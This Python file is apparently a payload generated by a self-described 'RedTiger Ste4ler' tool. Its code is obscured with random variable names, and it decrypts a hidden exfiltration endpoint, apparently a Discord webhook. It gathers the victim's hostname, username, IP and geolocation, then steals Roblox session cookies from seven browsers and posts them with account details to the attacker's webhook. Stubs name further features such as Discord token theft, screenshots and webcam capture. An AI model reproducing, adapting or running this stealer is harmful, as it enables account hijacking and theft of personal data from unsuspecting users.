
import sys

def On1y_W1nd0w5():
    if sys.platform.startswith("win"):
        return False
    else:
        return True

try: PWHMJWNNOAVGBMMGOWNCNYBXRMDCUYALWWOBWTQBGAWAWNWOVZROJVIWAVTVPUIWP = On1y_W1nd0w5()
except: PWHMJWNNOAVGBMMGOWNCNYBXRMDCUYALWWOBWTQBGAWAWNWOVZROJVIWAVTVPUIWP = False

if PWHMJWNNOAVGBMMGOWNCNYBXRMDCUYALWWOBWTQBGAWAWNWOVZROJVIWAVTVPUIWP == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import threading
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def B10ck_K3y(): pass
def Unb10ck_K3y(): pass
def B10ck_T45k_M4n4g3r(): pass
def B10ck_M0u53(): pass
def B10ck_W3b5it3(): pass
def St4rtup(): pass
def Sy5t3m_Inf0(): pass
def Op3n_U53r_Pr0fi13_53tting5(): pass
def Scr33n5h0t(): pass
def C4m3r4_C4ptur3(): pass
def Di5c0rd_T0k3n(): pass
def Di5c0rd_inj3c710n(): pass
def Br0w53r_5t341(): pass
def R0b10x_C00ki3(): pass
def F4k3_3rr0r(): pass
def Sp4m_0p3n_Pr0gr4m(): pass
def Sp4m_Cr34t_Fil3(): pass
def Shutd0wn(): pass
def Sp4m_Opti0ns(): pass
def R3st4rt(): pass

def Clear():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def Decrypt(FOLHQHLSGVHDXZKVCKPUOMEMVEVDLXTNUMBFBYVHUTNIPILVKMSWUQWTAFHDRMWJJWGFPJZAGLM, v4r_key):
    def DeriveKey(v4r_password, v4r_salt):
        v4r_kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=v4r_salt, iterations=100000, backend=default_backend())
        if isinstance(v4r_password, str):  
            v4r_password = v4r_password.encode()  
        return v4r_kdf.derive(v4r_password)

    FOLHQHLSGVHDXZKVCKPUOMEMVEVDLXTNUMBFBYVHUTNIPILVKMSWUQWTAFHDRMWJJWGFPJZAGLM_data = base64.b64decode(FOLHQHLSGVHDXZKVCKPUOMEMVEVDLXTNUMBFBYVHUTNIPILVKMSWUQWTAFHDRMWJJWGFPJZAGLM)
    v4r_salt = FOLHQHLSGVHDXZKVCKPUOMEMVEVDLXTNUMBFBYVHUTNIPILVKMSWUQWTAFHDRMWJJWGFPJZAGLM_data[:16]
    v4r_iv = FOLHQHLSGVHDXZKVCKPUOMEMVEVDLXTNUMBFBYVHUTNIPILVKMSWUQWTAFHDRMWJJWGFPJZAGLM_data[16:32]
    FOLHQHLSGVHDXZKVCKPUOMEMVEVDLXTNUMBFBYVHUTNIPILVKMSWUQWTAFHDRMWJJWGFPJZAGLM_data = FOLHQHLSGVHDXZKVCKPUOMEMVEVDLXTNUMBFBYVHUTNIPILVKMSWUQWTAFHDRMWJJWGFPJZAGLM_data[32:]
    v4r_derived_key = DeriveKey(v4r_key, v4r_salt)
    v4r_cipher = Cipher(algorithms.AES(v4r_derived_key), modes.CBC(v4r_iv), backend=default_backend())
    v4r_decryptor = v4r_cipher.decryptor()
    v4r_decrypted_data = v4r_decryptor.update(FOLHQHLSGVHDXZKVCKPUOMEMVEVDLXTNUMBFBYVHUTNIPILVKMSWUQWTAFHDRMWJJWGFPJZAGLM_data) + v4r_decryptor.finalize()
    v4r_unpadder = padding.PKCS7(128).unpadder()
    v4r_original_data = v4r_unpadder.update(v4r_decrypted_data) + v4r_unpadder.finalize()
    return v4r_original_data.decode()

CKMLKIGDKBNDQQBVBDEWICDVEAIXFXKQZUXXWWLSGOZFQMUBFQVPTNR = r"""
tKBQ7USEEjRCmYgsOsD+ZFI0gaAdpa2/ERG5bUv62bmGS1Rwd5Segxnrm7S/1OzY8XRlWUuWMjCd8ChJQYBUwg==
"""
OGDBCLDCHJPGAPEFTEPIROCXUEUGFJJAUOBAEZNZBJLJXYQFMQKOJMPLLKKYZKHUIGZANHTJOBAGRPDECHLIUAEEKOILYMKK = "vrFRZcnGcwVILoKAszrusYnAJVQzwDnAoJScYXMlRABpwdIiRHhFNuaLMKhnUsBiEwDVOqQkDEzWdAEyqscpSzJfzJJFdFIqCgaJOrQogUgBFdmeRxkswXwMLLTqlFLotZvzRXxMhibhjBMtexERkwPmweGNLZGFPEQBLoyx"
VEDYWYWSWIHLSMPUOBYOXJMERLNSZRFKGUWOCVRJVHUBJKIOXVMKPW = "redtiger.shop"
BATBPWHEFJSZWBCVGSTISICSRWQWIOEFDRXZPQHHXLPQNRLTJJFCIYFQBOONGFRKIVAQVLYSKRITBCTICPSSTDKWWFRUNGX = 0xa80505
XYWSUCNTVDRELXLGGAXRVIEJHNWCABPGRWDQPTYTNUJLCKTHNLKIAUVCRFTIGKWUWHTFCVUAJQZZJBMVCXFGCNWFLGWXDDKJXMAQ = "RedTiger Ste4ler"
BQZADZTSFONOFQNMWOYTXBOAEICLPOWLHZPNGDEJCUGWJTXAVMIVZNKHDABKVLFAPS = "https://cdn.discordapp.com/attachments/1268900329605300234/1276010081665683497/RedTiger-Logo.png?ex=66cf38be&is=66cde73e&hm=696c53b4791044ca0495d87f92e6d603e8383315d2ebdd385aaccfc6dbf6aa77&"
PXOFLNMLNUZLYFRLEJGFJNDTMYAGLOIMSULAOOADPDYRGWJYIXTURSPWIOCRQXSRODTFKVLTQKDRWHRICD = "RedTiger Ste4ler - github.com/loxy0dev/RedTiger-Tools"
ASNOMOJXEWLAIZQLONMRUYAUJLDSTYFNQGRSQPTVFKZRQVLOYJHLYBRJENJCQWULMJGFWCVXTQCUNVASHDZJCLWTFPZMDXJIF = {
        "text": PXOFLNMLNUZLYFRLEJGFJNDTMYAGLOIMSULAOOADPDYRGWJYIXTURSPWIOCRQXSRODTFKVLTQKDRWHRICD,
        "icon_url": BQZADZTSFONOFQNMWOYTXBOAEICLPOWLHZPNGDEJCUGWJTXAVMIVZNKHDABKVLFAPS,
        }
                 
POGPJIKJLSDUWIJBOLHVUXUFHJRTVRAQQBFXVDXOXZNWARDZXNOXUEIVARZCHCRTLIIWXQFXXBZFDLIJVVFBREHREXDEEYLNBK = Decrypt(CKMLKIGDKBNDQQBVBDEWICDVEAIXFXKQZUXXWWLSGOZFQMUBFQVPTNR, OGDBCLDCHJPGAPEFTEPIROCXUEUGFJJAUOBAEZNZBJLJXYQFMQKOJMPLLKKYZKHUIGZANHTJOBAGRPDECHLIUAEEKOILYMKK)

try: ZVIYJBEWQDDRFPTPSZHQKNLWGBSJHVVPASFGXQMQSQIMLNHGLJNRSPRN = socket.gethostname()
except: ZVIYJBEWQDDRFPTPSZHQKNLWGBSJHVVPASFGXQMQSQIMLNHGLJNRSPRN = "None"

try: MGPUEEUVFJOISAIBQTFESNUOCQLQDXZGHNEBQRIAKUZTUDQTMNWZJETEHLHNGUNEFWNL = os.getlogin()
except: MGPUEEUVFJOISAIBQTFESNUOCQLQDXZGHNEBQRIAKUZTUDQTMNWZJETEHLHNGUNEFWNL = "None"

try: VHHJSSRDGKMSGPIHGGYIPNJCKTYTOVKJIDFYVSKBECDMBQBWAUBRRS = win32api.GetUserNameEx(win32api.NameDisplay)
except: VHHJSSRDGKMSGPIHGGYIPNJCKTYTOVKJIDFYVSKBECDMBQBWAUBRRS = "None"

try: MQEQNJOAZFPHLRCKPTVKLRPZHVTYQBXQBVGESUHGESEXQGLOJMKGHGCROGHHATRQPTLVYLXGSUOZVLGSAWJXDYYUGBIRQWSK = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: MQEQNJOAZFPHLRCKPTVKLRPZHVTYQBXQBVGESUHGESEXQGLOJMKGHGCROGHHATRQPTLVYLXGSUOZVLGSAWJXDYYUGBIRQWSK = "None"

try: CZOYRITVWWUELTDTBSUSKMAUENLCQIAUEHSJQURFDMCLAYGDXDIWACQIFRXPDJEPFHVYNZZCSRRFPRP = socket.gethostbyname(socket.gethostname())
except: CZOYRITVWWUELTDTBSUSKMAUENLCQIAUEHSJQURFDMCLAYGDXDIWACQIFRXPDJEPFHVYNZZCSRRFPRP = "None"

try:
    TTCAMGQQKUPZAVAENAZXSKXIXXWEICDBIGABQOHXRBLWJLIPWJHISEMBSEWTQOVCSMIRHXYOUALJDXWPHATY = requests.get(f"https://{VEDYWYWSWIHLSMPUOBYOXJMERLNSZRFKGUWOCVRJVHUBJKIOXVMKPW}/api/ip/ip={MQEQNJOAZFPHLRCKPTVKLRPZHVTYQBXQBVGESUHGESEXQGLOJMKGHGCROGHHATRQPTLVYLXGSUOZVLGSAWJXDYYUGBIRQWSK}")
    HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI = TTCAMGQQKUPZAVAENAZXSKXIXXWEICDBIGABQOHXRBLWJLIPWJHISEMBSEWTQOVCSMIRHXYOUALJDXWPHATY.json()

    IHBYJCZGXGJTLISCTZGASFMXOFPLQFVJOFDRWAGZMBJUADSLODFPSR = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('country', "None")
    IHBYJCZGXGJTLISCTZGASFMXOFPLQFVJOFDRWAGZMBJUADSLODFPSR_code = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('country_code', "None")
    QERTLHCNDXDCGIUYANGRHACOKNJIJDYWKYVAACDHFBBFOFDOXTJJWJNAA = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('region', "None")
    QERTLHCNDXDCGIUYANGRHACOKNJIJDYWKYVAACDHFBBFOFDOXTJJWJNAA_code = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('region_code', "None")
    XUNPSUOMIOXKUEZMHDDVEOVDBCQDDEDKIQDNHELSXKXOCGJYCTMIVXBMERSIVECHLAOIGZOWFCVJKIKKSTPVVLIR = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('zip', "None")
    HNZSNREJGRFBBTEOAAEUPMBRSMBZLQSMLJYFWBNRTPAADBBICBCPLKYZNEJMKNKZZXTXGWYBIUPLDJSIBURGJMCEDSJJTY = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('city', "None")
    GUNLQGTXUIHNXEEILDYKDHKPUPPKXTOZQEKYNTYEVBLTADUFWUNJXVAYUDTUNUGWAAKBONGUEPUHNHCZXLYZJKXOTMO = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('latitude', "None")
    AIHLACYMMOEJNVDZPCAXPDPWIXRGVFZMBMJMDCGQBXQDAGCJBOERLSHINSWDZAAAJVJJBFBQFQAVIZ = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('longitude', "None")
    QYYMILDJPHXRJQUTXPLTDAWOFVXGNPITHKFCQVNTTZUCYBIGOGBNFGFZVJUHHWPQQXHVRXGSGDDWTXZKDGSLSFUSPYJMEC = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('timezone', "None")
    NYIFSJNAVDDTGGZWAGSPLAWVBYZYQRTQPWBQEBFUVMQOQIGTMLBZJSGMUVKH = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('isp', "None")
    FZUPMDEBLFSXBNHOSEOLGTMMSTPCZJYKYYIYPSNDEWXVTTTSMVGZSYJSLYSRDGRKTAHDUY = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('org', "None")
    CIVQPVWQPIEIAMENLSEWLDIUFATFEBMMJFKYGUOTALWUBAQIZLLCYEPGRKVHMRKQNGDRAPFLTRJDK = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('as', "None")
except:
    TTCAMGQQKUPZAVAENAZXSKXIXXWEICDBIGABQOHXRBLWJLIPWJHISEMBSEWTQOVCSMIRHXYOUALJDXWPHATY = requests.get(f"http://ip-api.com/json/{MQEQNJOAZFPHLRCKPTVKLRPZHVTYQBXQBVGESUHGESEXQGLOJMKGHGCROGHHATRQPTLVYLXGSUOZVLGSAWJXDYYUGBIRQWSK}")
    HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI = TTCAMGQQKUPZAVAENAZXSKXIXXWEICDBIGABQOHXRBLWJLIPWJHISEMBSEWTQOVCSMIRHXYOUALJDXWPHATY.json()

    IHBYJCZGXGJTLISCTZGASFMXOFPLQFVJOFDRWAGZMBJUADSLODFPSR = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('country', "None")
    IHBYJCZGXGJTLISCTZGASFMXOFPLQFVJOFDRWAGZMBJUADSLODFPSR_code = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('countryCode', "None")
    QERTLHCNDXDCGIUYANGRHACOKNJIJDYWKYVAACDHFBBFOFDOXTJJWJNAA = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('regionName', "None")
    QERTLHCNDXDCGIUYANGRHACOKNJIJDYWKYVAACDHFBBFOFDOXTJJWJNAA_code = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('region', "None")
    XUNPSUOMIOXKUEZMHDDVEOVDBCQDDEDKIQDNHELSXKXOCGJYCTMIVXBMERSIVECHLAOIGZOWFCVJKIKKSTPVVLIR = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('zip', "None")
    HNZSNREJGRFBBTEOAAEUPMBRSMBZLQSMLJYFWBNRTPAADBBICBCPLKYZNEJMKNKZZXTXGWYBIUPLDJSIBURGJMCEDSJJTY = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('city', "None")
    GUNLQGTXUIHNXEEILDYKDHKPUPPKXTOZQEKYNTYEVBLTADUFWUNJXVAYUDTUNUGWAAKBONGUEPUHNHCZXLYZJKXOTMO = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('lat', "None")
    AIHLACYMMOEJNVDZPCAXPDPWIXRGVFZMBMJMDCGQBXQDAGCJBOERLSHINSWDZAAAJVJJBFBQFQAVIZ = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('lon', "None")
    QYYMILDJPHXRJQUTXPLTDAWOFVXGNPITHKFCQVNTTZUCYBIGOGBNFGFZVJUHHWPQQXHVRXGSGDDWTXZKDGSLSFUSPYJMEC = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('timezone', "None")
    NYIFSJNAVDDTGGZWAGSPLAWVBYZYQRTQPWBQEBFUVMQOQIGTMLBZJSGMUVKH = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('isp', "None")
    FZUPMDEBLFSXBNHOSEOLGTMMSTPCZJYKYYIYPSNDEWXVTTTSMVGZSYJSLYSRDGRKTAHDUY = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('org', "None")
    CIVQPVWQPIEIAMENLSEWLDIUFATFEBMMJFKYGUOTALWUBAQIZLLCYEPGRKVHMRKQNGDRAPFLTRJDK = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('as', "None")

def R0b10x_C00ki3():
    import browser_cookie3
    import requests
    import json
    from discord import SyncWebhook, Embed
    import discord

    HXLZFRPFLTSEUHKXTZGLVOHMLUKEUAPVGBNLGPZOIKPELYPITJRFZGEDLQJA = []
    def g3t_c00ki3_4nd_n4vig4t0r(HIUFSYYMYGWAPJDLOQYZFTDQIUWWGVKIYSYMMBCQIQRSWFFEYKMJXODTO):
        try:
            v4r_c00kie5 = HIUFSYYMYGWAPJDLOQYZFTDQIUWWGVKIYSYMMBCQIQRSWFFEYKMJXODTO()
            v4r_c00kie5 = str(v4r_c00kie5)
            v4r_c00kie = v4r_c00kie5.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
            v4r_n4vigator = HIUFSYYMYGWAPJDLOQYZFTDQIUWWGVKIYSYMMBCQIQRSWFFEYKMJXODTO.__name__
            return v4r_c00kie, v4r_n4vigator
        except:
            return None, None

    def Microsoft_Edge():
        return browser_cookie3.edge(domain_name="roblox.com")

    def Google_Chrome():
        return browser_cookie3.chrome(domain_name="roblox.com")

    def Firefox():
        return browser_cookie3.firefox(domain_name="roblox.com")

    def Opera():
        return browser_cookie3.opera(domain_name="roblox.com")
    
    def Opera_GX():
        return browser_cookie3.opera_gx(domain_name="roblox.com")

    def Safari():
        return browser_cookie3.safari(domain_name="roblox.com")

    def Brave():
        return browser_cookie3.brave(domain_name="roblox.com")

    EDNTTNBSCMTIFAMTXNWBZYFQONGMOUOCZRULWKDRPQFNNSRLQZUJGORFTSYGHSHMDGSZBOKGCHFMJDVXZFRIBCFEDUPVQSXA = [Microsoft_Edge, Google_Chrome, Firefox, Opera, Opera_GX, Safari, Brave]
    for v4r_br0ws3r in EDNTTNBSCMTIFAMTXNWBZYFQONGMOUOCZRULWKDRPQFNNSRLQZUJGORFTSYGHSHMDGSZBOKGCHFMJDVXZFRIBCFEDUPVQSXA:
        v4r_c00ki3, v4r_n4vigator = g3t_c00ki3_4nd_n4vig4t0r(v4r_br0ws3r)
        if v4r_c00ki3:
            if v4r_c00ki3 not in HXLZFRPFLTSEUHKXTZGLVOHMLUKEUAPVGBNLGPZOIKPELYPITJRFZGEDLQJA:
                HXLZFRPFLTSEUHKXTZGLVOHMLUKEUAPVGBNLGPZOIKPELYPITJRFZGEDLQJA.append(v4r_c00ki3)
                try:
                    QNUYWDROKOUETYVXTHSPQHORFTAMTAOLNPAPOXCUBBMTMGSMSQUZFIEMJKFBJAARMHNOBZVQBKDGRNKXJYPOBYGN = requests.get("https://www.roblox.com/mobileapi/userinfo", cookies={".ROBLOSECURITY": v4r_c00ki3})
                    HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI = json.loads(QNUYWDROKOUETYVXTHSPQHORFTAMTAOLNPAPOXCUBBMTMGSMSQUZFIEMJKFBJAARMHNOBZVQBKDGRNKXJYPOBYGN.text)
                except:
                    pass

                RDMPPSMWLZGRMFVCCQAZWUREJNBYPSVNWUKDIPBDKSSPNDCNANKWSNRGSEC = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('id', "None")
                DHNCSKWOGGQCCDYWTOFXMVPRVTILDAKHMNIQGMYSAJQAETQPGSZ = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('displayName', "None")
                LEWUEMZKBVVLGVUSYJWOTXVCGLIGGSSORLRBLNWKWSNRYCZWKLRWJVNRKGGMTMENJEEQPODVXSRJAGOSXU = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get('name', "None")
                GPBIEQVTPUPPCKTADLBXHYZSSLBAEMHNNBVABHKKSDDSNATSYTOXYGPKOMSQHUOVYWCGDEVGFXQKDWLZFPTNT = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get("RobuxBalance", "None")
                HESZEMAYVTOFZZRWVGGUVLOOGOIHWHIENFIRNFZWPOYESLQXZKUOUTAYPKHYZOUXQKYRCCRL = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get("IsPremium", "None")
                WGIGXQHYLNRHCCSUHDSLZSSSBYGZABVMPJPNVNMYOSUKMHCYEVLEOVG = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get("ThumbnailUrl", "None")
                ZZSHXGNUMSBPOUDOCGAEWTJUAKMJGOQGRWFCJOVJBANZKFISWIECQEUFKMJEQJTLHUZDUQYHMWWDXZOBCWGCBVJOSHXF = HQOTIDCBDFKQACWXVUHMOGVHUKEFQCUKHDUWPREOVEOBLLNJLJUIHBNDHKRFBYURPPYBAQAAFLPRMLTHQECJJJGXCWYGPPBI.get("IsAnyBuildersClubMember", "None")
        
                SOKRWUYKWQVKFSDFOEGTAKTUAUJBUMLWLLFNIIKPIAMXVBOQVBZTQXVHPETJDRTKOSDSRGPFSCQRNWEM = len(v4r_c00ki3)
                UNGNFMPHICJIRBGKUKZEGIAKRLGKUUKJATUWXQXWUTKAPXXZVBSZBLUPKCNKVDO = SOKRWUYKWQVKFSDFOEGTAKTUAUJBUMLWLLFNIIKPIAMXVBOQVBZTQXVHPETJDRTKOSDSRGPFSCQRNWEM // 2
                TCMFTUCHVWVQLPEDXFJVPTBAFBWAMAQIVOLWVLVYCBXOFSILHXPBGINSPGSQPYYLMSGCUSOICMOHTZR = v4r_c00ki3[:UNGNFMPHICJIRBGKUKZEGIAKRLGKUUKJATUWXQXWUTKAPXXZVBSZBLUPKCNKVDO]
                UEOQOHHEQJOZDHOQOPDKFTTJWMYKMCWCSDEFAHDLUJHWBNFGBVOFELFU = v4r_c00ki3[UNGNFMPHICJIRBGKUKZEGIAKRLGKUUKJATUWXQXWUTKAPXXZVBSZBLUPKCNKVDO:]

                OXGAFHVQQZNINCNHSSTWQYOXDBHCIFJDLRLWCCTDFJQLURWCQWMIHCAOOFWHSBTMPLBJYFJREVNIAGPRUIBXJGLWHHJQVSRPMBH = SyncWebhook.from_url(POGPJIKJLSDUWIJBOLHVUXUFHJRTVRAQQBFXVDXOXZNWARDZXNOXUEIVARZCHCRTLIIWXQFXXBZFDLIJVVFBREHREXDEEYLNBK)

                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP = discord.Embed(
                    title=f'Roblox Cookie `{MGPUEEUVFJOISAIBQTFESNUOCQLQDXZGHNEBQRIAKUZTUDQTMNWZJETEHLHNGUNEFWNL} "{MQEQNJOAZFPHLRCKPTVKLRPZHVTYQBXQBVGESUHGESEXQGLOJMKGHGCROGHHATRQPTLVYLXGSUOZVLGSAWJXDYYUGBIRQWSK}"`:',
                    color=BATBPWHEFJSZWBCVGSTISICSRWQWIOEFDRXZPQHHXLPQNRLTJJFCIYFQBOONGFRKIVAQVLYSKRITBCTICPSSTDKWWFRUNGX
                )
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.set_footer(text=PXOFLNMLNUZLYFRLEJGFJNDTMYAGLOIMSULAOOADPDYRGWJYIXTURSPWIOCRQXSRODTFKVLTQKDRWHRICD, icon_url=BQZADZTSFONOFQNMWOYTXBOAEICLPOWLHZPNGDEJCUGWJTXAVMIVZNKHDABKVLFAPS)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.set_thumbnail(url=WGIGXQHYLNRHCCSUHDSLZSSSBYGZABVMPJPNVNMYOSUKMHCYEVLEOVG)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.add_field(name=":compass: Navigator:", value=f"```{v4r_n4vigator}```", inline=True)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.add_field(name=":bust_in_silhouette: Username:", value=f"```{LEWUEMZKBVVLGVUSYJWOTXVCGLIGGSSORLRBLNWKWSNRYCZWKLRWJVNRKGGMTMENJEEQPODVXSRJAGOSXU}```", inline=True)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.add_field(name=":bust_in_silhouette: DisplayName:", value=f"```{DHNCSKWOGGQCCDYWTOFXMVPRVTILDAKHMNIQGMYSAJQAETQPGSZ}```", inline=True)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.add_field(name=":robot: Id:", value=f"```{RDMPPSMWLZGRMFVCCQAZWUREJNBYPSVNWUKDIPBDKSSPNDCNANKWSNRGSEC}```", inline=True)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.add_field(name=":moneybag: Robux:", value=f"```{GPBIEQVTPUPPCKTADLBXHYZSSLBAEMHNNBVABHKKSDDSNATSYTOXYGPKOMSQHUOVYWCGDEVGFXQKDWLZFPTNT}```", inline=True)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.add_field(name=":tickets: Premium:", value=f"```{HESZEMAYVTOFZZRWVGGUVLOOGOIHWHIENFIRNFZWPOYESLQXZKUOUTAYPKHYZOUXQKYRCCRL}```", inline=True)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.add_field(name=":construction_site: Builders Club:", value=f"```{ZZSHXGNUMSBPOUDOCGAEWTJUAKMJGOQGRWFCJOVJBANZKFISWIECQEUFKMJEQJTLHUZDUQYHMWWDXZOBCWGCBVJOSHXF}```", inline=True)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.add_field(name=":cookie: Cookie Part 1:", value=f"```{TCMFTUCHVWVQLPEDXFJVPTBAFBWAMAQIVOLWVLVYCBXOFSILHXPBGINSPGSQPYYLMSGCUSOICMOHTZR}```", inline=False)
                WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.add_field(name=":cookie: Cookie Part 2:", value=f"```{UEOQOHHEQJOZDHOQOPDKFTTJWMYKMCWCSDEFAHDLUJHWBNFGBVOFELFU}```", inline=False)

